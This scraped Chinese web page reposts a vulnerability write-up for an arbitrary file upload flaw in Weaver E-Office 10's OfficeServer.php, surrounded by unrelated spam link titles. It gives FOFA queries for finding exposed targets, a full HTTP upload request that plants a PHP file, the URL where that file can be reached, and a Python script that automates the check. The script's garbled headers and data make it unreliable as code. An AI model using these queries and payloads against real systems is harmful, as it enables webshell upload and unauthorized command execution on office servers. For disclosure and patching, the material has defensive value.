当前位置: 首页 > news >正文

福州市建设工程材料价格管理系统网站网站建设公司哪里可以做

news 2026/5/4 12:44:21
福州市建设工程材料价格管理系统网站,网站建设公司哪里可以做,稿定设计网页版登录,临夏建设网站声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件#xff0c;泛微 …声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞攻击者可以上传任意文件获取webshell在服务器上执行任意命令、读取敏感信息等 FOFA语法 bodyeoffice10 bodyeoffice_loading_tip Poc POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 395 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryJjb5ZAJOOXO7fwjs Accept-Encoding: gzip, deflate Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFileData; filename1.jpg Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);? ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--漏洞复现 1、访问漏洞环境 2、老形式burp重放一下 出现下面的状态码和响应包说明漏洞可能存在 3、然后访问如下的URL链接,即可查看上传文件内容 http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php poc(python脚本 import re import requestsurlhttp://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php headers {User - Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0,Content - Length:393,Content - Type: multipart / form - data;,boundary ----WebKitFormBoundaryJjb5ZAJOOXO7fwjsAccept - Encoding: gzip, deflate,Connection:close }data {------WebKitFormBoundaryJjb5ZAJOOXO7fwjsContent-Disposition: form-data; nameFileData; filename1.jpg,Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);?------WebKitFormBoundaryJjb5ZAJOOXO7fwjs,Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php}------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- }response requests.post(url, headersheaders, datadata)print(Status Code:, response.status_code)if response.status_code 200:print(存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞) 修复建议 去官网打补丁
http://www.hkea.cn/news/14528217/

相关文章:

  • 模板网站免费昆明网站建设php
  • 瑞安网站建设优化网站建设新技术
  • 网站标题符号的应用wordpress用户注册邮件验证
  • 网站开发厂商wordpress 安装失败
  • 网站上线流程图可以用自己电脑做网站吗
  • 销售产品网站有哪些高校网站建设方案
  • 在国外做购物网站怎么做网站关键词视频
  • 如何使用二级域名做网站阳江招聘网最新招聘信息网
  • 怎么建设自己网站的后台教学网站设计与开发
  • 利用百度网盘自动播放做视频网站短视频网站开发教程
  • 网站建设 的介绍wordpress 网页压缩
  • 企业网站建设外包服务合同阿里云域名注册口令
  • 个人博客网站注册wordpress网站内容
  • 网站开发不足之处建设工程信息平台官网
  • 网站开发业务pptwordpress多个single
  • 网站优化什么意思wordpress必备文件组合
  • 湛江市网站建设北京商场停业最新消息
  • .net开发网站怎么样大连网站的优化
  • 中国蔬菜网网站建设电话历下区住房和城市建设局网站
  • 甪直做网站辽宁工程建设信息网网站
  • 如何做网站搬家wordpress 文章带字段
  • 做修图网站电脑配置开鲁网站seo不用下载
  • 北京外包公司 网站开发360推广登录平台
  • 宁波建设公司网站中国乐清新闻
  • 上海营销型网站建设哪家好网页设计公司背景
  • 做问卷网站好捕鱼游戏网站开发商
  • 电子商务与网站建设实践论文怎么查自己是不是团员
  • 怎么seo网站推广wordpress英文源码
  • 做编辑器的网站南宁个人网站建设
  • 茶叶电子商务网站开发技术支持亚马逊雨林地图